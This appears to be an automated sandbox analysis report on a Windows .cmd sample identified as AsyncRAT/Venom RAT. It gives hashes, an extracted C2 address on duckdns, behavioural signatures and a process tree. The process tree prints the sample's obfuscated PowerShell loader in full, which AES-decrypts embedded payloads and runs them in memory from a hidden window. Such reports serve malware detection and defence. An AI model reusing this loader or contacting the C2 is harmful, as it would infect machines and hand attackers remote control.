Analysis

  • max time kernel
    133s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-05-2024 13:26

General

  • Target

    c993fe19772483493944a04b83c5842049b2ddf5f4f2289f7ecd67d1245658e0.cmd

  • Size

    82KB

  • MD5

    0c9dd4a4644d5271be6bf540daccb191

  • SHA1

    452415383fd54926ce19f8f78258dc57d87c98ef

  • SHA256

    c993fe19772483493944a04b83c5842049b2ddf5f4f2289f7ecd67d1245658e0

  • SHA512

    194d82615358dfc579e508768e2b2e3357069ea626cf90415f58459943a147e0c58d600091bf8840c1e06db9962ca01b3cd2cf9f1ee3d6685bd8d62a6219eab5

  • SSDEEP

    1536:cHkGj8vp9NrhTu1iCrjNk9CRsphfkA0tNJxCK9dLbw3/4cLT4H/INmxklg:cHB8nrhTu1L8CRsp+RtIK4v3nUcM

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

C2

undjsj.duckdns.org:8890

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\c993fe19772483493944a04b83c5842049b2ddf5f4f2289f7ecd67d1245658e0.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2568
    • C:\Windows\system32\cmd.exe
      cmd /c \"set __=^&rem\
      2⤵
        PID:4872
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\c993fe19772483493944a04b83c5842049b2ddf5f4f2289f7ecd67d1245658e0.cmd
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1116
        • C:\Windows\system32\cmd.exe
          cmd /c \"set __=^&rem\
          3⤵
            PID:1672
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\c993fe19772483493944a04b83c5842049b2ddf5f4f2289f7ecd67d1245658e0.cmd';$pbWn='CCiQDreCiQDatCiQDeCiQDDeCiQDcCiQDryCiQDptCiQDoCiQDrCiQD'.Replace('CiQD', ''),'ReaxqAidLxqAiinxqAiesxqAi'.Replace('xqAi', ''),'InQyKRvokQyKReQyKR'.Replace('QyKR', ''),'SplnwOxitnwOx'.Replace('nwOx', ''),'TwpaoranwpaosfowpaormFwpaoinawpaolBwpaolwpaoocwpaokwpao'.Replace('wpao', ''),'MHTmMainHTmMModHTmMuleHTmM'.Replace('HTmM', ''),'DjIQtejIQtcomjIQtprjIQtesjIQtsjIQt'.Replace('jIQt', ''),'GXkOEetXkOECuXkOErrXkOEenXkOEtPXkOErocXkOEeXkOEssXkOE'.Replace('XkOE', ''),'CopSQYnyTSQYnoSQYn'.Replace('SQYn', ''),'EnPEgatrPEgayPoPEgainPEgatPEga'.Replace('PEga', ''),'ElmTJxemmTJxenmTJxtAtmTJx'.Replace('mTJx', ''),'FrqclComqclCBqclCaseqclC64qclCStqclCrinqclCgqclC'.Replace('qclC', ''),'ChraKjanraKjgeraKjExraKjtenraKjsraKjioraKjnraKj'.Replace('raKj', ''),'LwzKkoawzKkdwzKk'.Replace('wzKk', '');powershell -w hidden;function YbNek($AfeKW){$JkaZj=[System.Security.Cryptography.Aes]::Create();$JkaZj.Mode=[System.Security.Cryptography.CipherMode]::CBC;$JkaZj.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$JkaZj.Key=[System.Convert]::($pbWn[11])('V0mh2MCToA3bNgC8EKO2KMAaZFb3l+ctJ6Wraknusvw=');$JkaZj.IV=[System.Convert]::($pbWn[11])('prJfwam6dZ/6yyv50tuZSA==');$fCuEB=$JkaZj.($pbWn[0])();$kBOHP=$fCuEB.($pbWn[4])($AfeKW,0,$AfeKW.Length);$fCuEB.Dispose();$JkaZj.Dispose();$kBOHP;}function hgyps($AfeKW){$ALoua=New-Object System.IO.MemoryStream(,$AfeKW);$GsRzp=New-Object System.IO.MemoryStream;$WrauX=New-Object System.IO.Compression.GZipStream($ALoua,[IO.Compression.CompressionMode]::($pbWn[6]));$WrauX.($pbWn[8])($GsRzp);$WrauX.Dispose();$ALoua.Dispose();$GsRzp.Dispose();$GsRzp.ToArray();}$dfSrb=[System.IO.File]::($pbWn[1])([Console]::Title);$CHSWN=hgyps (YbNek ([Convert]::($pbWn[11])([System.Linq.Enumerable]::($pbWn[10])($dfSrb, 5).Substring(2))));$UqEWf=hgyps (YbNek ([Convert]::($pbWn[11])([System.Linq.Enumerable]::($pbWn[10])($dfSrb, 6).Substring(2))));[System.Reflection.Assembly]::($pbWn[13])([byte[]]$UqEWf).($pbWn[9]).($pbWn[2])($null,$null);[System.Reflection.Assembly]::($pbWn[13])([byte[]]$CHSWN).($pbWn[9]).($pbWn[2])($null,$null); "
            3⤵
              PID:4748
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass
              3⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2212
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2540
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4196,i,11266875042087428226,16669718873272757238,262144 --variations-seed-version --mojo-platform-channel-handle=4092 /prefetch:8
          1⤵
            PID:4752

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zfqielgq.o05.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/2212-14-0x000001BE757B0000-0x000001BE75826000-memory.dmp

            Filesize

            472KB

          • memory/2212-27-0x00007FFEBE790000-0x00007FFEBE985000-memory.dmp

            Filesize

            2.0MB

          • memory/2212-1-0x000001BE5B140000-0x000001BE5B162000-memory.dmp

            Filesize

            136KB

          • memory/2212-12-0x00007FFE9FFB0000-0x00007FFEA0A71000-memory.dmp

            Filesize

            10.8MB

          • memory/2212-13-0x000001BE756E0000-0x000001BE75724000-memory.dmp

            Filesize

            272KB

          • memory/2212-0-0x00007FFE9FFB3000-0x00007FFE9FFB5000-memory.dmp

            Filesize

            8KB

          • memory/2212-26-0x000001BE5B190000-0x000001BE5B1A2000-memory.dmp

            Filesize

            72KB

          • memory/2212-11-0x00007FFE9FFB0000-0x00007FFEA0A71000-memory.dmp

            Filesize

            10.8MB

          • memory/2212-28-0x00007FFEBE550000-0x00007FFEBE60E000-memory.dmp

            Filesize

            760KB

          • memory/2212-29-0x000001BE5B1D0000-0x000001BE5B1E0000-memory.dmp

            Filesize

            64KB

          • memory/2212-30-0x000001BE5B1E0000-0x000001BE5B1F6000-memory.dmp

            Filesize

            88KB

          • memory/2212-34-0x00007FFE9FFB0000-0x00007FFEA0A71000-memory.dmp

            Filesize

            10.8MB

          • memory/2212-35-0x00007FFE9FFB3000-0x00007FFE9FFB5000-memory.dmp

            Filesize

            8KB

          • memory/2212-36-0x00007FFE9FFB0000-0x00007FFEA0A71000-memory.dmp

            Filesize

            10.8MB